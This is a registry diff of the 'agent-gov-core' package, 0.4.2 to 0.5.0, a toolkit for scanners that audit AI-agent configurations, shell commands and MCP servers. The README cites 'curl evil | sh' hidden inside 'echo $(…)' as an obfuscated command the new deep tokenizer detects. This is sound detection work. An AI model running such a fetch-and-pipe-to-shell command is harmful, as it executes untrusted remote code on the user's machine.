agent-gov-core 0.4.2 → 0.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +0 -0
- package/README.md +8 -4
- package/dist/action.d.ts +30 -0
- package/dist/action.js +98 -0
- package/dist/finding.d.ts +16 -0
- package/dist/finding.js +13 -0
- package/dist/index.d.ts +4 -2
- package/dist/index.js +3 -2
- package/dist/jsonc.js +2 -1
- package/dist/locators.d.ts +3 -1
- package/dist/locators.js +96 -17
- package/dist/mcp.js +61 -2
- package/dist/parse-error.d.ts +54 -0
- package/dist/parse-error.js +85 -0
- package/dist/shell.d.ts +26 -0
- package/dist/shell.js +210 -1
- package/dist/toml.js +28 -7
- package/package.json +1 -1
- package/schemas/finding.schema.json +4 -0
package/CHANGELOG.md
CHANGED
|
Binary file
|
package/README.md
CHANGED
|
@@ -66,14 +66,16 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
|
|
|
66
66
|
- `isSeverity(v)`, `isToolKind(v)`, `isNamespacedKind(v)` — type guards
|
|
67
67
|
- `kind(tool, name)` — build a namespaced kind without hand-assembling the dotted string
|
|
68
68
|
- `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you
|
|
69
|
-
- `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe
|
|
69
|
+
- `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
|
|
70
70
|
- `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
|
|
71
71
|
|
|
72
72
|
### Config readers
|
|
73
|
-
- `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }
|
|
73
|
+
- `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
|
|
74
74
|
- `stripJsonComments(text)` — same logic exposed for in-memory text
|
|
75
|
-
- `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }
|
|
76
|
-
- `parseToml(text)` — same exposed for text
|
|
75
|
+
- `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. Errors are also `ConfigParseError` with `line`/`column`/`rawOffset` when resolvable.
|
|
76
|
+
- `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
|
|
77
|
+
- `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
|
|
78
|
+
- `lineColumnOfOffset(text, offset)` — convert a 0-based byte offset to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes byte positions and a `Finding.location` needs line/column.
|
|
77
79
|
|
|
78
80
|
### Line locators
|
|
79
81
|
- `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
|
|
@@ -85,12 +87,14 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
|
|
|
85
87
|
|
|
86
88
|
### Shell tokenization
|
|
87
89
|
- `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
|
|
90
|
+
- `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
|
|
88
91
|
- `getCommandHead(subcommand)` — extract the leading verb after tokenization
|
|
89
92
|
|
|
90
93
|
### GitHub Action helpers
|
|
91
94
|
- `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
|
|
92
95
|
- `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
|
|
93
96
|
- `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
|
|
97
|
+
- `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so findings remain visible even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest. Each severity group lists up to `perSeverityLimit` rows (default 100) and reports any remainder as a `(+N more)` row
|
|
94
98
|
|
|
95
99
|
### Test fixtures (`agent-gov-core/test-utils`)
|
|
96
100
|
Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
|
package/dist/action.d.ts
CHANGED
|
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
|
|
|
28
28
|
* // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
|
|
29
29
|
*/
|
|
30
30
|
export declare function emitFindingAnnotation(finding: Finding): string;
|
|
31
|
+
export interface WorkflowSummaryOptions {
|
|
32
|
+
/** Top-level heading. Default: `Findings`. */
|
|
33
|
+
title?: string;
|
|
34
|
+
/** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
|
|
35
|
+
perSeverityLimit?: number;
|
|
36
|
+
/** Truncate message to this many characters (with `…` suffix). Default: 200. */
|
|
37
|
+
messageMaxLength?: number;
|
|
38
|
+
}
|
|
39
|
+
/**
|
|
40
|
+
* Render a Markdown summary of findings suitable for writing to
|
|
41
|
+
* `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
|
|
42
|
+
* level, 50 per run) and silently drops the rest; the step summary has no
|
|
43
|
+
* such cap, so a Markdown table guarantees that 100% of findings are visible
|
|
44
|
+
* in the workflow's run summary page even when annotations are truncated.
|
|
45
|
+
*
|
|
46
|
+
* Findings are grouped by severity (critical → high → medium → low) inside
|
|
47
|
+
* collapsible `<details>` blocks. Each row carries file, line, kind, and a
|
|
48
|
+
* length-capped message. Pipe characters in message text are escaped so they
|
|
49
|
+
* don't break Markdown table rendering.
|
|
50
|
+
*
|
|
51
|
+
* @example
|
|
52
|
+
* import { generateWorkflowSummary } from 'agent-gov-core';
|
|
53
|
+
* import { appendFileSync } from 'node:fs';
|
|
54
|
+
*
|
|
55
|
+
* const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
|
|
56
|
+
* if (process.env.GITHUB_STEP_SUMMARY) {
|
|
57
|
+
* appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
|
|
58
|
+
* }
|
|
59
|
+
*/
|
|
60
|
+
export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
|
|
31
61
|
//# sourceMappingURL=action.d.ts.map
|
package/dist/action.js
CHANGED
|
@@ -76,4 +76,102 @@ function escapeProperty(s) {
|
|
|
76
76
|
.replace(/:/g, '%3A')
|
|
77
77
|
.replace(/,/g, '%2C');
|
|
78
78
|
}
|
|
79
|
+
/**
 * Render a Markdown summary of findings suitable for appending to
 * `$GITHUB_STEP_SUMMARY`.
 *
 * Layout of the returned text:
 *   1. `# <title>` heading.
 *   2. A `**Total**` line with the overall count and per-severity counts.
 *   3. One `<details>` block per non-empty severity, in the order
 *      critical → high → medium → low. Critical and high start expanded.
 *      Each block contains a four-column table (File, Line, Kind, Message).
 *
 * At most `perSeverityLimit` rows are rendered per group; any remainder is
 * reported as a single `(+N more …)` row. Messages are shortened with
 * `truncate` and every text cell goes through `escapeMarkdownTableCell`.
 *
 * Findings whose `severity` is not one of the four known levels are not
 * dropped and do not throw: they are collected into a trailing, expanded
 * `unrecognized` group and counted on the total line. For well-formed input
 * that group is empty and nothing extra is emitted.
 *
 * @param findings Findings to render. An empty list yields a short
 *   "No findings." document.
 * @param options Optional `title` (default `Findings`), `perSeverityLimit`
 *   (default 100, negative values are treated as 0) and `messageMaxLength`
 *   (default 200).
 * @returns The Markdown document as a single string.
 *
 * @example
 * import { generateWorkflowSummary } from 'agent-gov-core';
 * import { appendFileSync } from 'node:fs';
 *
 * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
 * if (process.env.GITHUB_STEP_SUMMARY) {
 *   appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
 * }
 */
export function generateWorkflowSummary(findings, options = {}) {
    const title = options.title ?? 'Findings';
    // A negative limit would make `slice(0, limit)` drop rows from the END of
    // the group and understate the overflow count, so clamp at zero.
    const perGroupLimit = Math.max(0, options.perSeverityLimit ?? 100);
    const messageMax = options.messageMaxLength ?? 200;
    if (findings.length === 0) {
        return `# ${title}\n\nNo findings.\n`;
    }
    const severityOrder = ['critical', 'high', 'medium', 'low'];
    // A Map (rather than a plain object) keeps lookups for odd severity values
    // such as "constructor" from resolving to prototype members.
    const groups = new Map();
    for (const severity of severityOrder) {
        groups.set(severity, []);
    }
    const unrecognized = [];
    for (const f of findings) {
        (groups.get(f.severity) ?? unrecognized).push(f);
    }
    const countsText = severityOrder
        .map((severity) => `${groups.get(severity).length} ${severity}`)
        .join(', ');
    const lines = [];
    lines.push(`# ${title}`, '');
    lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
        countsText +
        (unrecognized.length > 0 ? `, ${unrecognized.length} unrecognized` : ''));
    lines.push('');
    // Append one collapsible table for `group`; empty groups emit nothing.
    const renderGroup = (label, group, startOpen) => {
        if (group.length === 0)
            return;
        const shown = group.slice(0, perGroupLimit);
        const overflow = group.length - shown.length;
        lines.push(`<details${startOpen ? ' open' : ''}>`);
        lines.push(`<summary><strong>${group.length} ${label}</strong></summary>`);
        // Blank line so the Markdown table inside the HTML block is parsed.
        lines.push('');
        lines.push('| File | Line | Kind | Message |');
        lines.push('|------|------|------|---------|');
        for (const f of shown) {
            const cells = [
                escapeMarkdownTableCell(f.location?.file ?? '—'),
                f.location?.line ?? '—',
                escapeMarkdownTableCell(f.kind),
                escapeMarkdownTableCell(truncate(f.message, messageMax)),
            ];
            lines.push('| ' + cells.join(' | ') + ' |');
        }
        if (overflow > 0) {
            lines.push(`| _(+${overflow} more ${label} finding${overflow === 1 ? '' : 's'})_ | | | |`);
        }
        lines.push('');
        lines.push('</details>');
        lines.push('');
    };
    for (const severity of severityOrder) {
        renderGroup(severity, groups.get(severity), severity === 'critical' || severity === 'high');
    }
    renderGroup('unrecognized', unrecognized, true);
    return lines.join('\n');
}
|
|
158
|
+
/**
 * Cap `s` at `max` UTF-16 code units, marking a cut with a trailing `…`.
 *
 * - Strings that already fit are returned unchanged.
 * - The ellipsis counts toward the cap, so the result never exceeds `max`
 *   (for `max` of 1 the result is just `…`; for `max` ≤ 0 it is empty).
 * - The cut never lands between the two halves of a surrogate pair, so the
 *   output does not contain a dangling high surrogate before the ellipsis.
 *
 * @param s Text to shorten.
 * @param max Maximum length of the returned string, in UTF-16 code units.
 * @returns `s` itself when short enough, otherwise a shortened copy.
 */
function truncate(s, max) {
    if (s.length <= max)
        return s;
    if (max <= 0)
        return '';
    // Reserve one unit for the ellipsis.
    let keep = Math.floor(max) - 1;
    if (keep > 0) {
        const last = s.charCodeAt(keep - 1);
        // 0xD800–0xDBFF is the high-surrogate range; its partner would be cut off.
        if (last >= 0xd800 && last <= 0xdbff)
            keep--;
    }
    return s.slice(0, keep) + '…';
}
|
|
163
|
+
/**
 * Make an arbitrary value safe to place in one cell of a Markdown table that
 * is nested inside a `<details>` block.
 *
 * - `&`, `<` and `>` become HTML entities, so text such as `</summary>` or
 *   `<h1>` in a finding cannot close the surrounding `<details>` block or
 *   inject headings into the workflow summary.
 * - `|` is backslash-escaped so it is not read as a column separator.
 * - Line breaks (`\r\n`, `\n`, or a lone `\r`) become a single space because
 *   a table row must stay on one line.
 *
 * @param s Value to render; it is coerced with `String()`.
 * @returns The escaped single-line cell text.
 */
function escapeMarkdownTableCell(s) {
    return String(s)
        // `&` must go first, otherwise the entities added below would be
        // escaped a second time.
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/\|/g, '\\|')
        .replace(/\r\n?|\n/g, ' ');
}
|
|
79
177
|
//# sourceMappingURL=action.js.map
|
package/dist/finding.d.ts
CHANGED
|
@@ -26,6 +26,16 @@ export interface Finding {
|
|
|
26
26
|
location?: FindingLocation;
|
|
27
27
|
/** Stable identifier for dedupe across runs. Recommended: hash of (kind, location, salient fields). */
|
|
28
28
|
fingerprint?: string;
|
|
29
|
+
/**
|
|
30
|
+
* Optional discriminator that participates in the fingerprint hash. Set this
|
|
31
|
+
* when a single (kind, file, line) site can legitimately host multiple distinct
|
|
32
|
+
* findings — e.g. two suspicious imports on the same line, two MCP servers in
|
|
33
|
+
* the same JSON object, two npm dependencies declared in one package.json line.
|
|
34
|
+
* Without it, the meta-reviewer would dedupe them into one. Use a stable value
|
|
35
|
+
* that doesn't drift across reruns (package name, server name, rule id) — not
|
|
36
|
+
* a timestamp or counter.
|
|
37
|
+
*/
|
|
38
|
+
salientKey?: string;
|
|
29
39
|
/** Optional structured metadata; downstream meta-reviewers may inspect it. */
|
|
30
40
|
data?: Record<string, unknown>;
|
|
31
41
|
}
|
|
@@ -57,6 +67,12 @@ export interface CreateFindingSpec {
|
|
|
57
67
|
detail?: string;
|
|
58
68
|
location?: FindingLocation;
|
|
59
69
|
data?: Record<string, unknown>;
|
|
70
|
+
/**
|
|
71
|
+
* See {@link Finding.salientKey}. Pass when the same (kind, file, line) site
|
|
72
|
+
* can produce multiple distinct findings that must not collapse to one
|
|
73
|
+
* fingerprint.
|
|
74
|
+
*/
|
|
75
|
+
salientKey?: string;
|
|
60
76
|
/** Optional explicit fingerprint. If omitted, {@link fingerprintFinding} is computed. */
|
|
61
77
|
fingerprint?: string;
|
|
62
78
|
}
|
package/dist/finding.js
CHANGED
|
@@ -62,6 +62,8 @@ export function createFinding(spec) {
|
|
|
62
62
|
finding.detail = spec.detail;
|
|
63
63
|
if (spec.location !== undefined)
|
|
64
64
|
finding.location = spec.location;
|
|
65
|
+
if (spec.salientKey !== undefined)
|
|
66
|
+
finding.salientKey = spec.salientKey;
|
|
65
67
|
if (spec.data !== undefined)
|
|
66
68
|
finding.data = spec.data;
|
|
67
69
|
finding.fingerprint = spec.fingerprint ?? fingerprintFinding(finding);
|
|
@@ -99,6 +101,13 @@ export function fingerprintFinding(finding) {
|
|
|
99
101
|
finding.location?.line ?? '',
|
|
100
102
|
finding.location?.column ?? '',
|
|
101
103
|
];
|
|
104
|
+
// salientKey is appended ONLY when present. Appending `?? ''` would add a
|
|
105
|
+
// trailing pipe even for findings without salientKey, breaking the v0.4.2
|
|
106
|
+
// hash. This way pre-0.4.3 fingerprints stay stable for findings that
|
|
107
|
+
// never set salientKey, while new findings with one stay distinct.
|
|
108
|
+
if (finding.salientKey !== undefined) {
|
|
109
|
+
parts.push(finding.salientKey);
|
|
110
|
+
}
|
|
102
111
|
return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
|
|
103
112
|
}
|
|
104
113
|
const FINDING_ALLOWED_KEYS = new Set([
|
|
@@ -109,6 +118,7 @@ const FINDING_ALLOWED_KEYS = new Set([
|
|
|
109
118
|
'detail',
|
|
110
119
|
'location',
|
|
111
120
|
'fingerprint',
|
|
121
|
+
'salientKey',
|
|
112
122
|
'data',
|
|
113
123
|
]);
|
|
114
124
|
const LOCATION_ALLOWED_KEYS = new Set(['file', 'line', 'column', 'endLine', 'endColumn']);
|
|
@@ -145,6 +155,9 @@ export function validateFinding(value) {
|
|
|
145
155
|
if (v.fingerprint !== undefined && typeof v.fingerprint !== 'string') {
|
|
146
156
|
errors.push('fingerprint must be a string when present');
|
|
147
157
|
}
|
|
158
|
+
if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
|
|
159
|
+
errors.push('salientKey must be a string when present');
|
|
160
|
+
}
|
|
148
161
|
if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
|
|
149
162
|
errors.push('data must be an object when present');
|
|
150
163
|
}
|
package/dist/index.d.ts
CHANGED
|
@@ -4,10 +4,12 @@ export type { JsonObjectWithSource } from './jsonc.js';
|
|
|
4
4
|
export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
|
|
5
5
|
export type { TomlObjectWithSource } from './toml.js';
|
|
6
6
|
export { readTomlObject, parseToml } from './toml.js';
|
|
7
|
+
export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
|
|
7
8
|
export type { ByteRange } from './locators.js';
|
|
8
9
|
export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
|
|
9
10
|
export type { McpCommandSpec } from './mcp.js';
|
|
10
11
|
export { normalizeMcpCommand } from './mcp.js';
|
|
11
|
-
export { tokenizeShell, getCommandHead } from './shell.js';
|
|
12
|
-
export {
|
|
12
|
+
export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
|
|
13
|
+
export type { WorkflowSummaryOptions } from './action.js';
|
|
14
|
+
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
|
|
13
15
|
//# sourceMappingURL=index.d.ts.map
|
package/dist/index.js
CHANGED
|
@@ -1,8 +1,9 @@
|
|
|
1
1
|
export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
|
|
2
2
|
export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
|
|
3
3
|
export { readTomlObject, parseToml } from './toml.js';
|
|
4
|
+
export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
|
|
4
5
|
export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
|
|
5
6
|
export { normalizeMcpCommand } from './mcp.js';
|
|
6
|
-
export { tokenizeShell, getCommandHead } from './shell.js';
|
|
7
|
-
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
|
|
7
|
+
export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
|
|
8
|
+
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
|
|
8
9
|
//# sourceMappingURL=index.js.map
|
package/dist/jsonc.js
CHANGED
|
@@ -1,4 +1,5 @@
|
|
|
1
1
|
import { readFileSync } from 'node:fs';
|
|
2
|
+
import { toConfigParseError } from './parse-error.js';
|
|
2
3
|
/**
|
|
3
4
|
* Strip `//` line comments, `/* ... *\/` block comments, and trailing commas from JSONC,
|
|
4
5
|
* preserving byte offsets (replacement is space-filled, newlines preserved) so downstream
|
|
@@ -113,7 +114,7 @@ export function readJsonObjectWithSource(path) {
|
|
|
113
114
|
return { value: parsed, json: parsed, text };
|
|
114
115
|
}
|
|
115
116
|
catch (err) {
|
|
116
|
-
return { value: undefined, json: undefined, text, parseError: err };
|
|
117
|
+
return { value: undefined, json: undefined, text, parseError: toConfigParseError(text, err) };
|
|
117
118
|
}
|
|
118
119
|
}
|
|
119
120
|
//# sourceMappingURL=jsonc.js.map
|
package/dist/locators.d.ts
CHANGED
|
@@ -28,7 +28,9 @@ export declare function lineOfJsonKey(text: string, key: string, scope?: ByteRan
|
|
|
28
28
|
* The value is JSON-encoded before matching so values containing backslashes
|
|
29
29
|
* (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
|
|
30
30
|
* located correctly. The scan ignores JSONC comments so a commented-out
|
|
31
|
-
* matching value does not shadow the real one.
|
|
31
|
+
* matching value does not shadow the real one. The negative lookahead skips
|
|
32
|
+
* occurrences in key position (`"command":`) so a value matching a key name
|
|
33
|
+
* elsewhere in the document doesn't return the key's line.
|
|
32
34
|
*/
|
|
33
35
|
export declare function lineOfJsonStringValue(text: string, value: string, scope?: ByteRange): number;
|
|
34
36
|
/**
|
package/dist/locators.js
CHANGED
|
@@ -26,11 +26,13 @@ export function lineOfJsonKey(text, key, scope) {
|
|
|
26
26
|
* The value is JSON-encoded before matching so values containing backslashes
|
|
27
27
|
* (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
|
|
28
28
|
* located correctly. The scan ignores JSONC comments so a commented-out
|
|
29
|
-
* matching value does not shadow the real one.
|
|
29
|
+
* matching value does not shadow the real one. The negative lookahead skips
|
|
30
|
+
* occurrences in key position (`"command":`) so a value matching a key name
|
|
31
|
+
* elsewhere in the document doesn't return the key's line.
|
|
30
32
|
*/
|
|
31
33
|
export function lineOfJsonStringValue(text, value, scope) {
|
|
32
34
|
const encoded = jsonEncodeForRegex(value);
|
|
33
|
-
return findLineByRegex(text, new RegExp(`"${encoded}"`), scope);
|
|
35
|
+
return findLineByRegex(text, new RegExp(`"${encoded}"(?!\\s*:)`), scope);
|
|
34
36
|
}
|
|
35
37
|
/**
|
|
36
38
|
* Convert a string to the form it would appear in JSON source bytes, then
|
|
@@ -56,43 +58,120 @@ export function lineOfTomlKey(text, dottedKey, scope) {
|
|
|
56
58
|
const parts = splitTomlDottedKey(dottedKey);
|
|
57
59
|
if (parts.length === 0)
|
|
58
60
|
return 0;
|
|
59
|
-
const leaf = parts[parts.length - 1];
|
|
60
|
-
const prefix = parts.slice(0, -1);
|
|
61
61
|
const lines = text.split(/\r?\n/);
|
|
62
62
|
const inScope = scopeLineFilter(text, scope);
|
|
63
|
-
// Find header range we're inside of.
|
|
64
|
-
let inTargetTable = prefix.length === 0;
|
|
65
63
|
let currentTable = [];
|
|
66
|
-
|
|
64
|
+
// Track multi-line basic (`"""`) and literal (`'''`) string state. A leaf-key
|
|
65
|
+
// pattern can otherwise match against decoy text inside a multi-line string
|
|
66
|
+
// value — see lineOfTomlKey regression tests.
|
|
67
|
+
let inMultilineString = null;
|
|
67
68
|
for (let i = 0; i < lines.length; i++) {
|
|
68
69
|
const lineNumber = i + 1;
|
|
69
70
|
const raw = lines[i];
|
|
71
|
+
const stateAtLineStart = inMultilineString;
|
|
72
|
+
inMultilineString = updateMultilineStringState(raw, inMultilineString);
|
|
73
|
+
// If we entered this line inside a multi-line string, never match. The key
|
|
74
|
+
// pattern there is part of a string literal, not a real assignment.
|
|
75
|
+
if (stateAtLineStart !== null)
|
|
76
|
+
continue;
|
|
70
77
|
const trimmed = raw.trim();
|
|
71
78
|
const headerMatch = /^\[\[?\s*([^\]]+?)\s*\]\]?\s*(#.*)?$/.exec(trimmed);
|
|
72
79
|
if (headerMatch) {
|
|
73
80
|
currentTable = splitTomlDottedKey(headerMatch[1]);
|
|
74
|
-
inTargetTable = currentTable.join('.') === targetHeader;
|
|
75
81
|
continue;
|
|
76
82
|
}
|
|
77
|
-
if (!inTargetTable)
|
|
78
|
-
continue;
|
|
79
83
|
if (trimmed === '' || trimmed.startsWith('#'))
|
|
80
84
|
continue;
|
|
81
85
|
if (!inScope(lineNumber))
|
|
82
86
|
continue;
|
|
83
|
-
//
|
|
84
|
-
|
|
85
|
-
|
|
87
|
+
// Generalized dotted-key matching: if the current table is a strict
|
|
88
|
+
// prefix of (or equal to) the target dotted key, try matching the
|
|
89
|
+
// REMAINING dotted segments on this line. Covers all three cases:
|
|
90
|
+
// - Top-level (`a.b.c = 1` at root): currentTable=[] → match `a.b.c`
|
|
91
|
+
// - Inside a parent (`[a]\nb.c = 1`): currentTable=['a'] → match `b.c`
|
|
92
|
+
// - Inside the exact table (`[a.b]\nc = 1`): currentTable=['a','b'] → match `c`
|
|
93
|
+
const tableIsPrefix = currentTable.length <= parts.length &&
|
|
94
|
+
currentTable.every((seg, idx) => seg === parts[idx]);
|
|
95
|
+
if (!tableIsPrefix)
|
|
96
|
+
continue;
|
|
97
|
+
const remaining = parts.slice(currentTable.length);
|
|
98
|
+
if (remaining.length === 0)
|
|
99
|
+
continue;
|
|
100
|
+
// Remaining-as-dotted-key match (covers any depth ≥ 1). Build the
|
|
101
|
+
// regex from individual segments joined by `\s*\.\s*` so spaced dotted
|
|
102
|
+
// keys (`a . b . c = 1` — valid TOML) match as well as compact ones.
|
|
103
|
+
const segmentsPattern = remaining.map(escapeForRegex).join('\\s*\\.\\s*');
|
|
104
|
+
const dottedPattern = new RegExp(`^\\s*${segmentsPattern}\\s*=`);
|
|
105
|
+
if (dottedPattern.test(raw))
|
|
86
106
|
return lineNumber;
|
|
87
|
-
//
|
|
88
|
-
if (
|
|
89
|
-
const
|
|
90
|
-
|
|
107
|
+
// If remaining is exactly the leaf, also try the quoted-leaf forms
|
|
108
|
+
if (remaining.length === 1) {
|
|
109
|
+
const leafKey = remaining[0];
|
|
110
|
+
const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leafKey)}|"${escapeForRegex(leafKey)}"|'${escapeForRegex(leafKey)}')\\s*(?:\\.|=)`);
|
|
111
|
+
if (leafPattern.test(raw))
|
|
91
112
|
return lineNumber;
|
|
92
113
|
}
|
|
93
114
|
}
|
|
94
115
|
return 0;
|
|
95
116
|
}
|
|
117
|
+
/**
 * Walk one line of TOML text and report which multi-line string, if any, is
 * still open at the end of it.
 *
 * Inside a basic multi-line string (`"""…"""`) a backslash escapes the next
 * character, so `\"""` is literal text and NOT the closing delimiter; the
 * walker skips the character after each `\`. Literal multi-line strings
 * (`'''…'''`) do not process escapes per the TOML spec, so a backslash is
 * inert there.
 *
 * Outside a multi-line string the walker also steps over the constructs that
 * may legitimately contain a triple-quote sequence without opening a string:
 *   - `#` comments: the rest of the line is ignored;
 *   - single-line basic (`"…"`) and literal (`'…'`) strings.
 * Without this, `note = 'it"""s'` or `x = 1 # """` would flip the state and
 * every following line would be treated as string content.
 *
 * @param line One line of TOML source, without its line terminator.
 * @param current State on entry: `null`, `'"""'` or `"'''"`.
 * @returns State after the line, using the same three values.
 */
function updateMultilineStringState(line, current) {
    let state = current;
    let pos = 0;
    while (pos < line.length) {
        if (state !== null) {
            // Only basic multi-line strings honor backslash escapes.
            if (state === '"""' && line[pos] === '\\') {
                pos += 2; // skip the backslash AND the character it escapes
                continue;
            }
            if (line.startsWith(state, pos)) {
                state = null;
                pos += 3;
                continue;
            }
            pos++;
            continue;
        }
        const ch = line[pos];
        if (ch === '#') {
            // Comment: nothing after this point can open a string.
            break;
        }
        if (ch === '"' || ch === "'") {
            const triple = ch.repeat(3);
            if (line.startsWith(triple, pos)) {
                state = triple;
                pos += 3;
                continue;
            }
            pos = skipSingleLineTomlString(line, pos);
            continue;
        }
        pos++;
    }
    return state;
}
/**
 * Return the index just past the single-line string that opens at `start`.
 * An unterminated string consumes the rest of the line (single-line strings
 * cannot continue onto the next line).
 */
function skipSingleLineTomlString(line, start) {
    const quote = line[start];
    let i = start + 1;
    while (i < line.length) {
        // Escapes exist only in basic ("…") strings.
        if (quote === '"' && line[i] === '\\') {
            i += 2;
            continue;
        }
        if (line[i] === quote)
            return i + 1;
        i++;
    }
    return line.length;
}
|
|
96
175
|
function scopeLineFilter(text, scope) {
|
|
97
176
|
if (!scope)
|
|
98
177
|
return () => true;
|
package/dist/mcp.js
CHANGED
|
@@ -41,13 +41,47 @@ export function normalizeMcpCommand(spec) {
|
|
|
41
41
|
}
|
|
42
42
|
return parts.join('\n');
|
|
43
43
|
}
|
|
44
|
-
/**
|
|
44
|
+
/**
|
|
45
|
+
* Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix on Windows-style paths and
|
|
46
|
+
* lowercase those — Windows filesystem lookup is case-insensitive, so
|
|
47
|
+
* `NPX.CMD`, `npx.cmd`, and `npx` all refer to the same executable and
|
|
48
|
+
* should produce identical identity strings. POSIX paths (no backslash
|
|
49
|
+
* separator, no Windows suffix) keep their case because `./curl` and
|
|
50
|
+
* `./CURL` are genuinely different files there.
|
|
51
|
+
*/
|
|
45
52
|
function normalizeExecutable(cmd) {
|
|
46
53
|
const trimmed = cmd.trim();
|
|
47
54
|
const base = trimmed.replace(/\\/g, '/');
|
|
55
|
+
const hadWindowsSuffix = /\.(cmd|exe|bat|ps1)$/i.test(base);
|
|
48
56
|
const withoutSuffix = base.replace(/\.(cmd|exe|bat|ps1)$/i, '');
|
|
49
|
-
|
|
57
|
+
// Windows-shaped if the original used `\` separators or had a Windows
|
|
58
|
+
// executable suffix. In either case, case-fold for cross-machine identity.
|
|
59
|
+
const isWindowsShaped = hadWindowsSuffix || trimmed.includes('\\');
|
|
60
|
+
const cased = isWindowsShaped ? withoutSuffix.toLowerCase() : withoutSuffix;
|
|
61
|
+
// De-noise PATH-resolved runtimes: `/usr/bin/node` and `node` both run node.
|
|
62
|
+
// Only fold when the basename matches a known runtime so custom scripts at
|
|
63
|
+
// absolute paths (e.g. `/opt/internal/orchestrator.sh`) keep their identity.
|
|
64
|
+
const basename = cased.split('/').pop() ?? cased;
|
|
65
|
+
if (KNOWN_RUNTIMES.has(basename.toLowerCase())) {
|
|
66
|
+
return isWindowsShaped ? basename.toLowerCase() : basename;
|
|
67
|
+
}
|
|
68
|
+
return cased;
|
|
50
69
|
}
|
|
70
|
+
/**
|
|
71
|
+
* Common runtime executables whose absolute-path location varies across
|
|
72
|
+
* machines (PATH lookup resolves them) but whose identity for MCP-config
|
|
73
|
+
* purposes is the runtime name itself. Conservative — only entries where
|
|
74
|
+
* basename collapse is provably safe across the platforms an MCP config
|
